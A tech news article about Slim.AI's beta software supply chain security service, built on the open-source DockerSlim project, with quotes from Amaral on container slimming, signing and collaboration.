Slim.AI is rising to this challenge by announcing at Open Source Summit in Austin, Texas, its beta software supply chain security service. This service will help organizations continuously and automatically optimize and secure their containers and minimize software supply chain risk.
This service is being built on the foundation of Slim.AI's open-source project, DockerSlim. This popular developer program optimizes and secures your containers by analyzing your code and throwing away unnecessary code, thus "slimming" down your containers' attack surface. It also can reduce the size of your container by up to 30x.
That's impressive. As Amaral said, ``Currently, tens of thousands of developers and teams use Slim's open source and free SaaS software to understand what's in their containers, reduce containers' attack surface, remove vulnerabilities, and ship only the code they need." But, the open-source project doesn't scale. So with this new service, Amaral continued, "We're moving from helping individual developers and small teams to a solution that enables organizations to continuously and automatically achieve these outcomes at scale."
Current and planned integrations include Docker, AWS ECR, Google GCR, GitHub, DigitalOcean, and Quay registries and the Jenkins, GitLab, and GitHub CI/CD platforms. Application Programming Interfaces (APIs)s are also being made available to Early Access Partners.
In addition, thanks to its APIs, the service enables you to use multiple vulnerability scanners on your containers to find security problems before they bite you.
The good news about the open-source software supply chain is, Amaral explained, "it's really easy for developers to incorporate vast libraries of code into applications, package that into containers, and ship to production with the click of a button. The code running in production is the child of the massive supply chain." The bad news is that "It bears the benefits and risks of all the decisions, contributions, features, and flaws manifested by its creators in aggregate."
Signing: Signing is a way of digitally attaching a verified, immutable developer identity to a piece of code. Coupled with other tools, it allows for creating a transparent, cryptographically secure record of software changes and manifests a permanent, and reliable digital chain of custody for software and related artifacts. Sigstore and Notary.
Slimming: This minimizes your production code footprint by removing unnecessary code. It also inherently reduces software supply chain complexity, software attack surface, and aggregate risk.
Sharing: No one person or organization can provide a comprehensive SSCS solution. Communication about SSCS and collaborating on solutions both within your organization and with other groups is essential to advancing the industry and protecting our software-reliant global ecosystem. When it comes to open-source security, we're all in this together.
At Slim, Amaral concluded, "Our core value is 'Know Your Software.' Slim.AI's tools can be used alongside vulnerability scanners and SBOM generators to create a holistic view of the software supply chain." With Slim's optimization, you can make sure teams ship only what they need for production.